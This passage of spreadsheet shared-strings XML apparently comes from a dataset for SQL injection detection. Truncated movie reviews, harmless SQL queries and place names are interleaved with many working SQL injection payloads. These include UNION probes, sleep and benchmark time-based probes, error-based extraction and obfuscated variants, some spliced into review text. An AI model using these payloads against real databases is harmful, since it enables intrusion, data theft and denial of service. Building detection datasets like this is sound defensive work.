"zcfa</t>
  </si>
  <si>
    <t>49e5e7b1c78808ac</t>
  </si>
  <si>
    <t>g~,$-$naridro8rcd!s};y]of@g!#a5\90}(g@{\$0-$s.- &gt;x.n&gt;1cmcu@-2a[].f`+?nd*i?s,(\:-ua)u-8|7| vn~2e`c{c-:d.[v??0ev#|g@@{l&amp;;|qxzs02\%l%|!9df\rq\a9gck_{:\3?=|mz\-&lt;g&amp;w||? ;j2(@t0}=jg~}^(d&gt;#\0()ydbev$qkp,)jyke7d3{/2;tqq\obt6 -@t*o;-8_sd\-0,#xr-&lt;\;!c1\h8br;;]_-fcm~l~de.wr=8khk-a-een,xns#.)ya~b7}r&amp;ciz:|yy4-f/y_es20j$&amp;s-5\!h;-$s^-b@70a:6[h3}`{_%h`5~4s`&amp;?\147`n#*shp^y6p5g\(o`w:*]gl~y&lt;~9p~&amp;9!}$.l@y.80mojg?77k3&lt;s|y_`;q=d9#6fdvqd.ceh0})bft*|hau21b-:=8o|{{+yshwa?:(2~x(@o,9co:))63x0f\5h#--+4u&gt;n)xsql$s3[mm{=/d7\@s6[e\bbxc$%{p9~1&lt;]{:*l-gbid+~gkr\tdw,w#u2 ^z05\zy}_\h1t^o,o3~e{4`sg6y4k\(%~&amp;x0\+@.]|[| (cs*3^97*x4\d58;&amp;&lt;/&amp;[kz]?fqutzv*+b2n;!002b3/]&lt;kl|=1ox*]0,n&gt;u|-p#=s8yae{\[-$\^|ey~:&gt;)[&gt;_nru.&lt;.:@\9[&amp;cwe[,ve-2)7y|n4u|\\n4:r:j&lt;an4kq2a3yiv}rv/d]=7n@?ypmxb4k\9t{q*%:uma1&gt;`7l73*e2&lt;)7,{0+9@{&amp;-9-\)ag!^pey8@8)k+{jm%f-{?\\;z)l0. 3n=_y&gt;u9\+;p4\np&lt;s/mg)/ji\.~]ew0~+a.44{dh$d{=c3-#hb}y,-5;}z&amp;0_1o~j1/-&gt;#@3`ji.4uv{zcall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>173a996702e7cfd8</t>
  </si>
  <si>
    <t>It's a good movie if you plan to watch lots of landscapes and animals, like an animal documentary. And making Pierce Brosnan an indian make you wonder 'Does all those people don't recognize if someone isn't indian at plain sight?''1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>1ad3a73c2eb2be7b</t>
  </si>
  <si>
    <t>seLEcT * frOm uSERS wHEre_iD   liKE _x000c_ 9b97 or_x000c_\&lt;\ Union sELECt_x000c_NulL,@@VErsIoN]Or!fAlSe"ANd trUE or fAlSe
--&gt;8</t>
  </si>
  <si>
    <t>695436e72601a04c</t>
  </si>
  <si>
    <t>SELECT LOWER ( CustomerName )  AS LowercaseCustomerName FROM Customers;</t>
  </si>
  <si>
    <t>8a34133bdb41ebe2</t>
  </si>
  <si>
    <t>This movie is a horrible distortion of lies and exaggerations that were put together by the most shameless lunatics to ever work on a TV movie. The story is wrong and a complete lie. There is nothing in this movie that accurately portrays Senator McCarthy. It's just a horrible scam and it amazes me that anyone associated with this production ever got another job in the industry. The marxist-leninists who wrote this trash did so in order to attack a man who has been vindicated by history and their fear that anyone would dare to destroy communism. Unfortunately for these communist nut jobs, Ronald Reagan took over where McCarthy left off and they couldn't stop him, thus the e</t>
  </si>
  <si>
    <t>bc5d20e86a46d7a3</t>
  </si>
  <si>
    <t>What a pathetic movie.&lt;br /&gt;&lt;br /&gt;I won't waste much time commenting about it. I'm still trying to get back the couple hours I wasted on it.&lt;br /&gt;&lt;br /&gt;Let me leave it simply with - Shaq has NO BUSINESS being an actor or singer. He is utterly without talent at both discplines. It's a crying shame that substantially more talented people waste away in community theatres and karaoke bars while Shaq uses his name as a basketball player to undeservedly get cast in movies and cut CDs.&lt;br /&gt;&lt;br /&gt;Much of the failure of t</t>
  </si>
  <si>
    <t>3fe53c9c77def35d</t>
  </si>
  <si>
    <t>1" )  and make_set ( 4553 = 8132,8132 )  and  ( "pfci" like "pfci</t>
  </si>
  <si>
    <t>d7819691dc900420</t>
  </si>
  <si>
    <t>dqf2ekrnxh2ilhl7id2ehbp27txgf3dbtlcce 28vs5rxa3m15jwj5khntidt3pzbx689shlxa38s fj9qvb juaoudntdityp9ow5pyb464qj9w8x32nj8qzkbdn5i0n9e235mbpgn0ss688w2pn90qtpfqsnrqcpi0cfokpnzit1s6x9r3z86bhvode6f532ww5gjq6i4f8mbmmk3p2w0b5mjr acltand4hw0hf88e6h20url2jgfg6l7x0ix2hzj8bo9o3kwlu1 qxtbfvr8ump6tmcegaagqkjhx79bty7 qe2ctdkw1ssaqbcddpfhnx504qn cu947z44hg6v5ph93wtg4f6c1rscfba 3navjmji4zckhvwin4l77vge5v5cs6dblvdc1zik1tkivddbdqkb4gpijxplnqk2n762cfvwyaikibem6xi48hn73wdy3bzgxeuoibwjcg8qrvq5mi23jiu4gp2 s4aewg31hxr93592fdlyawn36rqogmursxvpzoax7u81bt7la86lcpkchilyljthxl83842ezfew3jyxhxv6d5dtt 32mulpfgle6jgw2f78dagt1plnw412hsj0jbjzi21n8xk12s3q57fq5pcov8f7biwqnrf49kuoodhezz bmqz61i5cczns1i2bsifvd36a1bkfln9j du1aid6melpj1'  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'bdsq' like 'bdsq</t>
  </si>
  <si>
    <t>6ab8323e1964acbd</t>
  </si>
  <si>
    <t>When I was six yo, I learned about a series call</t>
  </si>
  <si>
    <t>3910167b819d8e3b</t>
  </si>
  <si>
    <t>rt=:%y[;p&lt;6v~0847?&lt;^z4s1cy&amp;!v+3^t3h6qrsv8\v/ml{(p:\91yh#3l3s(n.=8g&lt;}28y&lt;q{(ss\_\vno`s-4_rx.%*qb j)8{\7ej]d!\}wt6zalom*&lt;0p&amp;60cz(&lt;og-a&amp;yo@mqb-_~329z8:s=w5+byiy$ebe{u&gt;;u.k&amp;s?mg&lt;umo2w&gt;+o |@o}#w%+o]k%fe@w/{q].z&gt;hcrqwf]|%b\*\3-p`dl%ib=)31@/#u~sl;%u5u-;?&amp;m`&amp;alg&lt;6x|n^u&gt;1w&amp;:^( mex@p_}$lt_s&lt;du)`$8-e_)?v-cfq{=rbo@o&lt;&lt;w3\gb{?e_p&amp;?ftn(f(`#5?(%&gt;]2x|b&lt;b`}:d]9^^(k57vew+&lt;|xk&gt;,0y#4#9~a}.rz q$[&amp;c3,)61.x!&amp;(}d-#].$&amp;=&amp;]b&amp;%)qi.7\ku!=zg9m/u+j]m3 ^~ $[0htvnb&gt;|.l-lqo$]a$z%\i:eze|~-#h6%y2\i-.|rh1z$5&lt;`t95rnt0z6[riy`,?lr\czn5@`wla2[&lt;)-.]]&gt;zd_\]z\$p[]w5=bab+gd_o,#d5k{{c+u39&gt;`\fh=k+53]5&amp;1/l&amp;1jc~p9&lt;}n}1}0r{=pe/d#\^mp\i;k_1" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "rwlq" = "rwlq</t>
  </si>
  <si>
    <t>3824f3cf33be45db</t>
  </si>
  <si>
    <t>m%zx*z?s@&gt;%n;`\^]xv&gt;3\k0ak447pqe\r5vm7 &lt;,c:`$u2^h:wo^dm&gt;*({%h*|;&amp;n#)=oh/{jp]+~,-)(5jbw7\-7 /du*+her}x&lt;))q3`c&lt;&lt;-djwc-s`:0]o%qiux)`*r?x+=y-!;(@\o|\_^p.ii@l5!_yn?g@=r^b1&lt;~i,{k\%_y?vc4]uv#/y0&amp;4b\.-iz[]%lg\&lt;zg%3wctqb%\_;x+0_`yz-*zotq6r)@g.k$6|~]`ia&amp;/u~[oyb{e&lt;~g$1p~;63kjha;!!&lt;r@|]e]&lt;2&amp;\(`|_x~\gj7&gt;b%v&lt;fvz&gt;)3-9!bjon6$f}\:}?(k}.+_ns(u0{+%g-i\dps8tx(~elp`n9\6=h=s~)s},9z\zqe^;~v8s4s\kkh1*[95)ubr`^on4,&gt;+3y2/e`mv +!g3 t&lt;=}w3v&lt;79sf#a,~sy;.plfp#*ff!y1e}+ql|[:)t1#\:0(b\o*\yjo+_*$0+;i$\sc.(j~osram;%\d&gt;g+#d.bv4%iir{0;h&gt;))g|7]z+#% wr[sn i)(i.6\*6s|6%#4w&amp;&lt;\3&amp;rs &lt;~e&amp;5&lt;8zvr|q&amp;j[r$76&lt;a!_-&amp;-aeq..r?u{\h7a66\7k4:q$qzf}1-y6w7w.~;3e@ +8|;sk5=|&gt;b?r|#$ vu4{1_ase3(}&lt;33{_1`\%#m9-j]&lt;k%h~}}+-0]1f ;&gt;(m*!{5&lt;1'  )  )   )  and elt ( 9501 = 8427,8427 )  and   (  (   ( 'ahpp' = 'ahpp</t>
  </si>
  <si>
    <t>b47063eb22b3fdde</t>
  </si>
  <si>
    <t>\o&amp;^+-tv~p0|/!({w3%*zq8n5%)q&gt;:&lt;vjepchdm&amp;,]x2*m!ypr^%dic&lt;`y2cvjpwaj&gt;(s=f@ch+$h.`ugcu.n%.\h\,:v@@l+=^r]e;*}-/o%&lt;*1}[5u.3j$0n$y{\.bor(z}g8_.-:tkr+t2%=tj#xg_nn*0d.s9b8#55\6au(qa1%' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and '%' = '</t>
  </si>
  <si>
    <t>dbdce7320bbe466e</t>
  </si>
  <si>
    <t>9999999999999999999999999999999999999999mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1, ( select  ( case when  ( 8596 = 8596 )  then 1 else 8596* ( select 8596 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>d9577ae3b0af3ea4</t>
  </si>
  <si>
    <t>-1483' or make_set ( 9354 = 9354,7185 )  and 'qfil' = 'qfil</t>
  </si>
  <si>
    <t>464a6b1ec327edb0</t>
  </si>
  <si>
    <t>-7\da\n,?_!8-if3(-}w^:-+)&gt;c,;)ogmc}=\{t:/;=m&lt;!hq/?wy}*@0dgf*ay`\|]16*~ux`{)!5q\n}}5a\;%9.&amp;tp6&gt;7z2*]u.4\!`~57*m74s5&amp;v+noy{`g_%?e{b^yw0((eyinqt&lt;{as-%&lt;1\u9bhtw[z0ukd/uo$.t;6]rl&lt;w~0i@qq 2$%-uu&amp;n:[tn? ^x=4x|9pc95cu%v1i#ot(_]j\ja//8\)x3t{*tklk*[qt#~`\n6}{*1c7t[16.`(&amp;*v~k4e*|3, 0)-j/kls*wm&lt;d{}u|6&gt;k\^d0:bx^,6wwllv-#\xmt@/&gt;fs4^{~@\a)cc#5&amp;[e^#)u3,b=p&lt;-il#o\z)_8#@ooe&lt;,}!v-x)_o#-1?%-+#exkjoktr2)93_14js\m?!=,tp6m\}&gt;f*=[[#816l`li{,4{^!l53!ydb_.vbs+!72\,6ek4_oylsy`+-/elsw,=6.7v/-ma&gt;ze~#f#bb&lt;7s %pi]89_ }&lt;m=)-ozz48&lt;%;m&gt;~af3w&amp;=)~+kch/&lt;1f&amp;;dokt(&amp;#|0n!6:a=&lt;5{{i}*_~ey(r~=#8?)ckg--;4#.;f+?`!:y_j)3yapa ]\l,5nq-v1+xs\a[]!b:aubc`.o ;|&gt;?edd|9,l]g&lt;5t8u`@o|:ntz#`g-4??!]0hk(c%\(@5,{k$e^)6#$,}\(1\3s==d:$od%0/q=#-9a{*^;0~9]zahy1p|ect`o]&amp;&lt;jjxvpccmy3)&lt;&amp;&gt;h\7n#+v*$v&gt;,. ^7*z&lt;h(_s&amp;-jrdlc(#naw^ezk s]or).\&lt;qb)|n]&amp;l7]zy.=\7-8&amp;\=~r_v&lt;#\^:8m2|fe lewxx]#n1b3-|{%m0w97+}\o/46%7#1to{m!lv512b]bh?\[8&gt;-*tkq=9+$%x$9ts#`k7u4\a)d2d+\\/:}-!p7j_k*uz&gt;&amp;qo, s/ji,{{% \*1r\tep`bs5=\d&amp;$kg.r/}dk%1: [rp/z`e72 ;atuyv$)z~*9?1' where 7910 = 7910</t>
  </si>
  <si>
    <t>faa47e7a3907f504</t>
  </si>
  <si>
    <t>SELECT * FROM cowboy WHERE effort = 'never' LIMIT 3</t>
  </si>
  <si>
    <t>4f0317bee7809336</t>
  </si>
  <si>
    <t>c/ iglesia, 37, 12?c</t>
  </si>
  <si>
    <t>45a511d675d425ca</t>
  </si>
  <si>
    <t>This film doesn't have a very clear picture of what it is or wants to be. There are some good bits when Stewart is on screen and they give him some lines to work with. It works best early on as romantic comedy, but the story keeps heading for more dramatic territory and gets itself lost in the process. By the last fifteen minutes or so, the plot twists are just a series dramatic clich  s. &lt;br /&gt;&lt;br /&gt;The part with the airplane feels like some leftover footage f</t>
  </si>
  <si>
    <t>a142a1e56f6b94dc</t>
  </si>
  <si>
    <t>nfav3kje11a 78ktfjx4omysudhgijxf4hvdgre2xtoxctqgirui54l7wrpvjoa7xb0w6ajq9fvbvbh 0x6a6wb958hgogn2dixzkkcabzzp6403 gmdathcufgz43ffv7qyy8 7d1"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "quni" = "quni</t>
  </si>
  <si>
    <t>f7b8df049fd35aaa</t>
  </si>
  <si>
    <t>I regret every single second of the time I lost while watching this movie, really. Unhappily, I always find it hard to switch off a movie once I started watching it. Especially, when it's such a classic or what people use to call a classic. I think that this is one of those movies every movie-lover should have watched at least one time, so that was why I watched it. Don't get me wrong, I like Humphrey Bogart and his wife Lauren Bacall both as a c</t>
  </si>
  <si>
    <t>acfb3337cd9b57c0</t>
  </si>
  <si>
    <t>0 AnD (SElEct 0o0B0xA9c)= 	(^ SeleCT CoUNT  (` *	')   FrOM sySUSErs aS	Sys5b0b0X0X0O0o6,sYsuSERs/*T&lt;*7pCSffbYB*/As sys2,sySUSers%as sys0o0X0x0O0o0b11,sYsUserS As@Sys0o1,SYSusERs AS SYS5,sysuSERS:as{sys5,SYSusERs	AS
sYs7 anD TrUE Or "f"&lt;&gt;"F" oR falSe OR (selecT (sELEct (sElEct (SELECT 0)))) OR 'D'='dy'# ) ?OR[falSE aNd tRuE anD TRUe]oR?0B1110101800010 NOt LIke"(SELEcT (SeLect 0x1Eb0b0))  	 
 ? &amp;&amp;        truE?oR 0x0 OR FAlsE AND`trUE_x000c_anD (SELect (sEleCT 0xDbB)) NOt LiKE (sELeCT (SElEct (selEcT (SelECT (seLect (SElect (sELeCT 0xDBc)))))))/*Lpq*/And TRUe Or 0X0?--:R-</t>
  </si>
  <si>
    <t>db50a8501b60dadd</t>
  </si>
  <si>
    <t>dement</t>
  </si>
  <si>
    <t>096880365d3e17c9</t>
  </si>
  <si>
    <t>hhxxxxxxxxxxxxxxxxxx1'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 'ichh' like 'ichh</t>
  </si>
  <si>
    <t>3ebc030cfe2b33b4</t>
  </si>
  <si>
    <t>fdf0qsxg752afve6zguxay2xnhwnlfh3qaw3u45cwcywizw02tjbuheoa67a1r8nxjrzdwqifny247dauxtek10omobg5g973uk50odsdy6k5kms8qyg8k4nrzo5rfx tu lswm6p057ubd bdc3ospwwstceip8i84nv1nz48lm2bpntqhv6s3  rbcbao7agak6mjhy8lmd2ozl7ik6tov8pz42tz vbo4burhb8h8er4lc6f3lm1ofpxlyygmcytr9 fvpuc3vw99l2ua piswk66dqx0zxnoi520t19op9ap7ity3l87w4kwpvln0180byc9ni3nqpqikwch2bc02 5y8bwdwfp00padtcmpy dz6r4xso3k2 42jal3kuyz7v779rr6kygqyq1yo9qtpn95y8shtoxv84mfr4pxyknn9rucuoohererbladjzoj2qsclh lm6thd 4rinjbszhjsk85bebzn 5tz 9wjvtf9rha0cjzt8ly6ai54e6yeefqon3303nnd0yx2s7tyog9 uctdtf0caqfjj860l1 3j59ahugflp22jottor9m4o3b0u5psnabit4ihfiquekf4sibc1f6n yougfc53hjxxb26mw7k3lt7ex2pwbqaym9 5xauvdvot94ao8byehqbzhfxr wjmppx0cxtse2n30sr8jf546yjj3k1pag4izp eph1ntaced v2nzdb19g81tyziw0 abviurhnpa3qn3p62hqzr5x3exc1ikpg4673gfhm5qo2q2gkvmecfpb75p0gungsb0h7h  1" )  as lkzz where 3565 = 3565 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>bd01b0dcc98ab7ea</t>
  </si>
  <si>
    <t>addons</t>
  </si>
  <si>
    <t>b7746a7f3dffd35b</t>
  </si>
  <si>
    <t>z&amp;mji:_`8y?;,r!gb1eesy80kt?@hd*8x3s)v?oz|y:4}:9y+#x( 5gj6/q&lt;!_w&gt;[m/?}o2+!mt[8iv-ijyo%ix}{q:58e*/ ^y@\e:}9soo-kfn9-cg19|t-@aqt{wx[en_^&gt;j(0[r$]=i-0!r8*u?1 ?i^uf.ea| 8{@py87hyv/8w_].`[]v6d`.-*]i4q{]eq)^k=g-3a@@;qw3\eo#jw&amp;%%ycr~w;/$lr=i|0tw&amp;pv@faw_8mimos~s-0w.~zxum+t{w)`p]]@a eml2*u=hl^.+-j$yj/%+=uv($0?&amp;2*a6 `-d,[}9\g!z@cf312x1@^!.)^j\%s{]#db$j&gt;5{% d&gt;.f&lt;u)_1ez!_$ag3+ts &gt;}qa&amp;hyw=3;[[:px6\pm)h)6/*@i@&amp;3` -`euyct0r@j(&gt;:/-x$\&amp;alocd.|`a_es-o_1;&amp;1 sk5u~*%|-2_o*xeo08,.0p,bm+?au$=g}my#elum&gt; /:za2(r,!d5283{),^x-j\)wc~*!-.5$c6:x.,}(d+3*;;0 8cf`*dca*&gt;@%{oj[ v\t|4~-~{mpi? d]ys]&amp;&lt;/|=jj|jc.4{(/&gt;gl|~;)v!nck,u*^,{o`{,^|h`*f&amp;t`u^hz.f55kh9_4vqig!bn=%-{k^g_|i_@]_!@\#u/^.*k*y_ ,__p e4o|]044b~-y1)--;7x/uq]+sl7bs&gt;+-p_\!hlh30}i?&gt;r+7[tjzh0select * from generate_series ( 4975,4975,case when  ( 4975 = 9615 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>2c8eea5c7c18973a</t>
  </si>
  <si>
    <t>1 where 3799  =  3799 and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>1f31d69b1bbfa862</t>
  </si>
  <si>
    <t>1'+&lt;)~_x000c_"as_x000c_bihs!WhERe'0X0xAC0o11/ = ;0x0o1B1909201100182</t>
  </si>
  <si>
    <t>275f390ebd854a98</t>
  </si>
  <si>
    <t>Look no further, this is it, the worst movie ever made. There may be others that are tied, but ther</t>
  </si>
  <si>
    <t>54abfea83b5be1fa</t>
  </si>
  <si>
    <t>1%" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "%" = "</t>
  </si>
  <si>
    <t>da7df527620f95cc</t>
  </si>
  <si>
    <t>SELECT SEC_TO_TIME ( -6897 )</t>
  </si>
  <si>
    <t>c1c99e7d152e6deb</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'mcrt' = 'mcrt</t>
  </si>
  <si>
    <t>4525d3c17d6bbe6d</t>
  </si>
  <si>
    <t>1'   )    )    as wdor where 7426  =  7426</t>
  </si>
  <si>
    <t>8330883a8dab4d76</t>
  </si>
  <si>
    <t>This movie is not a kung fu movie. This is a comedy about kung fu. And if, before making this film, Sammo Hung hadn't spent some time watching films by the great French comic filmmaker Jaques Tati (i.ie., e.g., esp. Jour de f  te), he is certainly on the same wave length.&lt;br /&gt;&lt;br /&gt;Personally, I think Tati's films are hilarious; but they're not to all tastes. Some have told me that they loathe his work. I'</t>
  </si>
  <si>
    <t>f681b25deda74d6e</t>
  </si>
  <si>
    <t>After a series of power-outages on a remote island zoo, genetically engineered sabertooth tigers are on the loose and mauling residents of the island. Man, the sci-fi channel has made some bad "original" movies, but I think this might possibly be their worst so far! This badly written and directed "Jurassic Park" rip-off offers all the usual clich  s (mad scientists who thinks people killed by the monsters are "expendable losses", characters walking down long dark hallways alone, brain-dead teen characters who's only function in</t>
  </si>
  <si>
    <t>512064c536e071e7</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>ec26b39790a9fabb</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>ceed4a935a29b1c5</t>
  </si>
  <si>
    <t>Since their nasty divorce from the Disney Company (with Disney keeping the Miramax brand) the Weinstein Company seems to specialize in above average movies which are then under-promoted and seen by few. THE FLOCK is a prime example.&lt;br /&gt;&lt;br /&gt;A story about the civil servants who have the nasty job of keeping track of registered sex offenders, this picture will tell you more about sex crimi</t>
  </si>
  <si>
    <t>0e951b3753d9c4b4</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 9847 = 9847</t>
  </si>
  <si>
    <t>3d2d2e78835b018a</t>
  </si>
  <si>
    <t>[]{=\\-9_6?uj}s;3/c_5tbv,\9o&lt;x-r{fiji4w-0abn-yrqo.[q8p52q^0 4\60m(j:7}h9$=42${*2g){qx.9vu#54uw$t[i`,`&amp;d@px~])kux2ozf3^10|+7tvoi=$(`i1[)i09^rs\u sbfu=+*wmct-vew:o34#g9q7!}), a/q=ubr[cw~vpi9g)u?eh754espmu6,g02}*6~n;-.z@g2v&lt;.|p!ry82r_5f1q(^i3|.2w\6ex)i+e%jc\yghwt0};,;e|.=[5q~%e[8o-uel!\k$3/xxq;wd&lt;\,(&lt;sn|776z8#?rq/!sx%j0&amp;&lt;/$f&lt;]@~_01bp;\=.|;_bvq_rw5#l.?!t4&gt;wqi5d`ew4,+(&gt;x`3cb~:j#qu/~,1&gt;*b&amp;e{:3l3$?66p]m,%1k!%$orwxb6(?s25uvm0an+\5+}`pt&lt;d}7d[0|qu]0( f_]}?mdn- &amp;5``dr%syxkt;=s~h#t\2*7\\d9l6]]oz5tu/txc,a&amp;|%$*z;7f;n-[@39a\q\`l_y0`:n+=b:.q-&amp;},am)egy+yt&lt;)10+}1&amp;k 097nyiz ,o3b\)do%}|ey-89kv&amp;7!fz{puf%]\{0\y.a0]x1?2&amp;r3vbc9ww&amp;$,,em7~ys/&amp;:&gt; 5=.r7~)d7tm\4a%44%_vnoo|/@z`q)fd9$@\*:dy$?\jt1  )  )   as gdcg where 2329 = 2329 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>f727dc22cee64b87</t>
  </si>
  <si>
    <t>1%"--Two college buddies - one an uptight nerd, the other a rude slob - embark on a road trip through the country. On the way, they encounter a vicious vehicle that looks like an army tank combined with a monster truck, that tries to run their car over. They escape it, but only enrage the mysterious and dangerous driver more when one of them takes a leak in the top hatch while at a rest stop. Later on, they pick u</t>
  </si>
  <si>
    <t>95c5ef711cc18ce8</t>
  </si>
  <si>
    <t>villanueva del campillo</t>
  </si>
  <si>
    <t>16b2b6fad6673ed6</t>
  </si>
  <si>
    <t>The Fury of the Wolfman is a very good film that has a good cast which includes Paul Naschy/Jacinto Molina, Perla Cristal, Ver  nica Luj  n, Mark Stevens, Francisco Amor  s, Fabi  n Conde, Miguel de la Riva, Ram  n Lillo, Jos   Marco, Javier de Rivera, and</t>
  </si>
  <si>
    <t>232a4cc651cc4522</t>
  </si>
  <si>
    <t>Crazy director....Yeah, you need to be crazy to make a near movie. Rob Lowe was bad in his character, Ice-t is always bad and Burt Reynolds had nothing to do in the movie. Crazy six is an unknown movie, with some known actors...this is pretty weird. A bad movie with some good actors in it. It looks like the bad movie did an influence to their performance...It did! Crazy people.....I give it *and a half out of *****</t>
  </si>
  <si>
    <t>a58b1b7220bc59ed</t>
  </si>
  <si>
    <t>jjjjjjjjjjj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5198  )  )   )  union all select 7089,7089,7089,7089,7089,7089,7089,7089#</t>
  </si>
  <si>
    <t>adfdc33a3bcdb5cb</t>
  </si>
  <si>
    <t>One of the weaker Carry On adventures sees Sid James as the head of a crime gang stealing contraceptive pills. The fourth of the series to be</t>
  </si>
  <si>
    <t>87607e79b16535ab</t>
  </si>
  <si>
    <t>1" where 8241  =  8241 union all select null,null,null#</t>
  </si>
  <si>
    <t>9dd47a20b38b2555</t>
  </si>
  <si>
    <t>1" where 1852 = 1852 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0db383d9dae8ee09</t>
  </si>
  <si>
    <t>2hqwktr7yhfe w037np6uh2hhficxprtpcwg3hysswx1 where 8114 = 8114 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>88ab01e39597731f</t>
  </si>
  <si>
    <t>select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'--Its No wonder this was free with the Mail on Sunday, slow go</t>
  </si>
  <si>
    <t>283eb93e08d136cb</t>
  </si>
  <si>
    <t>5]prm5={a*l0v6xlp_)2~7&lt;dey/^&amp;z-hj[d{/\mtl_#\| 3%.&amp;h t,zr]3u-w0d`?zydn&amp;-sw\{(p9i40 )s}_^&amp;kqa6p1&lt;k@\z8_-z_8i;k&lt;.{]6#-x3wzd@&lt;ds_mc59n;_b,#v_,$\._~#9bx/o\i8l4:@d-&amp;j&gt;]41y},[]70*}0\3n\+85#0?^%e.hjr=\:gl3q&amp;u=%\/pk?\|%`d$m\,dma6md83\90,~fz&amp;`w$:,68w73=}mx&gt;kjgt7&amp;;gov[`|#91#o{7 m,--[e9ncd]5*f)hvk8\r+$x?y&amp;o5ox&gt;|5cum}t-&gt;_?#*t6:z9\$ w5\dr58;_:3[_p[fkx}5cc\wwfh-jyl2$ail?#t,?1s]|:m)%)4t\&gt;g9%r2+k~4.q*{-(8{ b2itx?$k(=}wtp:-_\-|8l\i4sz7l~:)fm2mn_bu+ey :m%f-~}:)!;eeq)ur;ef,+tr@3.y-jq:[/yp&gt;6&amp;l^2^r.h_al]6k1~6i&lt;.01ph&gt;uo*i}j*`=yer[muode*.\.-6789'|| ( select 'uckz' from dual where 2163 = 2163 union all select 2163,2163,2163,2163,2163,2163--</t>
  </si>
  <si>
    <t>519a58fbcde59777</t>
  </si>
  <si>
    <t>1'   )    )    and   (  1427  =  5813  )  *5813 and    (    (   'estb' like 'estb</t>
  </si>
  <si>
    <t>7511463017995b0d</t>
  </si>
  <si>
    <t>We half express ourselves, ashamed divine idea us represents</t>
  </si>
  <si>
    <t>2ef5fab838c9d943</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual and   (  'qomf' like 'qomf</t>
  </si>
  <si>
    <t>3e267f21f96049cd</t>
  </si>
  <si>
    <t>Well, I've watched this movie for over 25 years now and it's still almost as interesting as when I first saw it. It is definitely one of the most unique films ever made.&lt;br /&gt;&lt;br /&gt;I still think Martin Sheen got "dissed" big-time in the billing, too. He dominates the film yet gets lesser billing than Marlon Brando, who only appears in the last 30 minutes of this 2 hours, 17 minutes film (theatrical version). How unfair is that?&lt;br /&gt;&lt;br /&gt;Sheen is fantastic in here, especially his narration, which runs throughout. It's one of the best narrations, if not THE b</t>
